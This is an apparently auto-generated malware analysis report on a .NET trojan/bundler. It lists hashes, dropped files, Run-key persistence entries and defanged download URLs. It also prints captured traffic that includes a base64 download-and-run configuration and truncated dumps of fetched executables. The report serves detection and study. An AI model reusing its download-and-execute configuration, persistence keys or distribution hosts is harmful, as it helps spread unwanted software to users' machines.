Trojan.MSIL.Agent.COX_ab576cd404

by malwarelabrobot on July 29th, 2017 in Malware Descriptions.

Trojan.MSIL.Agent.COX (BitDefender), SoftwareBundler:MSIL/Wizrem (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.7345 (DrWeb), GenericRXBY-VX!AB576CD404F5 (McAfee), Trojan.Gen (Symantec), Trojan.MSIL.Agent.COX (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ab576cd404f53426599c8b5fb1a30ae9
SHA1: 577fbfd73fe0e069e1736614809e29dc2caa47bf
SHA256: 92861cc91f72148f54885852a189a238978d007628d9b0a74b8454cfda0e0bda
SSDeep: 1536:NQORufiOW2Uip5Eb8LK8jm3ChiZ2xTuVVGQF:NQORufiVtS5Eb8LK8jqChiZoqVVTF
Size: 53248 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-12 18:20:22
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

SecondL.exe:1692
Sho9libi.exe:1764
OneTwo.exe:2320
%original file name%.exe:3424

The Trojan injects its code into the following process(es):

%original file name%.exe:3492
KRH6BP3WS.exe:548
is4p1fniere.exe:2072

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SecondL.exe:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe (204 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)

The process Sho9libi.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.1764.343685 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.1764.343685 (0 bytes)

The process OneTwo.exe:2320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\KRH6BP3WSZ\uninstaller.exe.config (1 bytes)
%Program Files%\KRH6BP3WSZ\uninstaller.exe (29599 bytes)
%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe (124075 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2320.341361 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2320.341361 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2320.341361 (0 bytes)

The process %original file name%.exe:3492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe (17797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe (1117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe (230392 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe.config (1 bytes)

The process KRH6BP3WS.exe:548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\KRH6BP3WSZ\cast.config (37 bytes)

Registry activity

The process SecondL.exe:1692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Sho9libi.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

The process OneTwo.exe:2320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASMANCS]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_R2ZKP" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process KRH6BP3WS.exe:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HDURM51XOVAKJHF" = "%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe"

The process is4p1fniere.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"4ffk2bt3ky1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe"

Dropped PE files

MD5 File path
2379b7c1da53357ea4ca529d85510aae c:\Program Files\KRH6BP3WSZ\KRH6BP3WS.exe
b837412325a20d6b0e3d52e584d21541 c:\Program Files\KRH6BP3WSZ\uninstaller.exe
0357be320d39ee6b2192dfa86eaa9bbd c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe
53b9881ed1f83f7160f8bcfab76c44f3 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe
a9df6632b06facd1f079fa234731b22e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe
4d10a4b718cfbe93311ec4b90e2cb8b0 c:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: C6KAT
Product Version: 1.2.4.0
Legal Copyright: Copyright (c) 1726
Legal Trademarks:
Original Filename: dowsFormsApplication.exe
Internal Name: dowsFormsApplication.exe
File Version: 1.2.4.0
File Description: C
Comments: C6KATBJND
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 47548 47616 4.30641 8c345a9e24fc5137d123342e21f04db6
.rsrc 57344 4492 4608 3.50605 9c8fa6e6055c2fb2d415a2507466b49f
.reloc 65536 12 512 0.056519 263e40833b941676dc3e5caee2e92c8f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 176.31.252.74
hxxp://nihamatioto.com/from_backup/747474/AdsShow_installer.exe 94.23.199.17
hxxp://nihamatioto.com/3/000000/wizzcaster_installer_v2.exe 94.23.199.17
hxxp://nihamatioto.com/exe/updater.exe 94.23.199.17
hxxp://nihamatioto.com/safe_download/582369/AdsShow.exe 94.23.199.17
hxxp://nihamatioto.com/download/3/wizzcaster_v2.exe 94.23.199.17
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 176.31.252.74
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 176.31.252.74
hxxp://nihamatioto.com/download/3/wizzcaster_uninstaller_v2.exe 94.23.199.17
hxxp://www.wizzmonetize.com/api/v5/config 176.31.252.74
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 176.31.106.195
hxxp://wizzcaster.com/api/v5/config 176.31.115.114
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 176.31.106.195


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=21uu3dq3e0qp2kofrf0me7i597; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=la2m4a3g8dm9c99n91i8ob7iv1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1

HTTP/1.1 200 OK


Date: Fri, 28 Jul 2017 11:59:40 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=21jjjadttjeee2jf749j186tp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vbmloYW1hdGlvdG8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA3MjgiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDcyOCIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vbmloYW1hdGlvdG8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDcyOCIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwNzI4IiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL25paGFtYX
Rpb3RvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwNzI4Ii8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA3MjgiIG1h
<<< skipped >>>


POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: nihamatioto.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
fe200..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...!.{Y.........."...0.................. ........@.. .................
......@............@.................................L...O.......8....
................ .....................................................
.. ............... ..H............text........ ...................... 
..`.rsrc...8...........................@..@.reloc....... .............
.........@..B........................H.......L#..@............2.......
........................................0..j.......(.....(..... ......
..(......~....o..........o..........o........ ....o........o...... ...
.. ....o........o........!....o........o........"....o........o......(
.......(....o......%...%..,.o......(.....o........o......(.......(....
o......%...%..,.o......(.....o........~....o............o....t........
.o........o ...(!.....(............io"...o....(.....(......&..*..A....
.......f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[.
.p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($..
...o%...r...po......o&...t'..........%...o....&*....0..S.........&....
('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%............
.....*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~...
.*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l....
...#~..8...$...#Strings....\...<...#US.........#GUID...........#Blo
b...........W..........3........,...................1.............
<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1


Host: nihamatioto.com


HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
4da00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...".{Y.........."...0.............v.... ........@.. .................
......@............@.................................$...O.......d....
................ .....................................................
.. ............... ..H............text...|.... ...................... 
..`.rsrc...d...........................@..@.reloc....... .............
.........@..B................X.......H.......L#..@............2..`....
........................................0..j.......(.....(..... ......
..(......~....o..........o..........o........ ....o........o...... ...
.. ....o........o........!....o........o........"....o........o......(
.......(....o......%...%..,.o......(.....o........o......(.......(....
o......%...%..,.o......(.....o........~....o............o....t........
.o........o ...(!.....(............io"...o....(.....(......&..*..A....
.......f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[.
.p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($..
...o%...r...po......o&...t'..........%...o....&*....0..S.........&....
('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%............
.....*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~...
.*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l....
...#~..8...$...#Strings....\...<...#US.........#GUID...........#Blo
b...........W..........3........,...................1.............
<<< skipped >>>


GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: nihamatioto.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:43 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2800..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
....{Y.........."...0..............;... ...@....@.. ..................
..................@.................................x;..O....@..T.....
...............`......@:..............................................
. ............... ..H............text........ ...................... .
.`.rsrc...T....@......................@..@.reloc.......`.......&......
........@..B.................;......H........"...............9........
......................................Zs....r...ps.....o....*..(....*.
.0............(....(....rq..pru..po....(....%(....&(....rq..pru..po...
.rw..p(....(.......  ... ....1...... ....3..&...X.... X...2...X.. ....
2..(....(...........%.r...p.%.r...p.%.r...p.%.r]..p.%.r...p.%.r...p.%.
r...p.%.r...p.%.ru..p.%..r...p.%..r...p.%..rZ..p.%..r...p.%..r...p.%..
ra..p.%..r...p.%..r...p.%..r...p.%..r...p.%..r'..p.%..rA..p.%..r_..p.%
..r}..p.%..r...p.%..r...p.%..r/..p.(......rQ..p(.....(......,.....( ..
.& ..ru..p( ...&..&..*..A............................~....-.ra..p.....
(!...o"...s#........~....*.~....*.......*.~....*..($...*Vs....(%...t..
.......*BSJB............v2.0.50727......l.......#~......d...#Strings..
..........#US.........#GUID.......$...#Blob...........W..........3....
....'...................%.............................................
../...........c.....s.......[.....[.....[.....[...O.[...h.[.....[.....
....!.......[...............m...../.....F.............*...w.F.....
<<< skipped >>>

GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1


Host: nihamatioto.com


HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:43 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
54c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...!.{Y.........."...0..6..........NU... ...`....@.. .................
...................@..................................T..O....`..d....
........................S.............................................
.. ............... ..H............text...T5... ...6.................. 
..`.rsrc...d....`.......8..............@..@.reloc...............J.....
.........@..B................0U......H.......L#..@............2..8!...
........................................0..j.......(.....(..... ......
..(......~....o..........o..........o........ ....o........o...... ...
.. ....o........o........!....o........o........"....o........o......(
.......(....o......%...%..,.o......(.....o........o......(.......(....
o......%...%..,.o......(.....o........~....o............o....t........
.o........o ...(!.....(............io"...o....(.....(......&..*..A....
.......f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[.
.p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($..
...o%...r...po......o&...t'..........%...o....&*....0..S.........&....
('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%............
.....*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~...
.*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l....
...#~..8...$...#Strings....\...<...#US.........#GUID...........#Blo
b...........W..........3........,...................1.............
<<< skipped >>>

GET /exe/updater.exe HTTP/1.1


Host: nihamatioto.com


HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:44 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
20f000..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L.....{Y.........."...0... ........... .. ....!...@.. ................
.......@!...........@.................................|. .O.....!.d...
................. !.....D. ...........................................
... ............... ..H............text..... .. .... .................
 ..`.rsrc...d.....!....... .............@..@.reloc....... !....... ...
..........@..B.................. .....H.......L#..@............2.... .
.........................................0..j.......(.....(..... .....
...(......~....o..........o..........o........ ....o........o...... ..
... ....o........o........!....o........o........"....o........o......
(.......(....o......%...%..,.o......(.....o........o......(.......(...
.o......%...%..,.o......(.....o........~....o............o....t.......
..o........o ...(!.....(............io"...o....(.....(......&..*..A...
........f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[
..p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($.
....o%...r...po......o&...t'..........%...o....&*....0..S.........&...
.('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%...........
......*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~..
..*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l...
....#~..8...$...#Strings....\...<...#US.........#GUID...........#Bl
ob...........W..........3........,...................1............
<<< skipped >>>


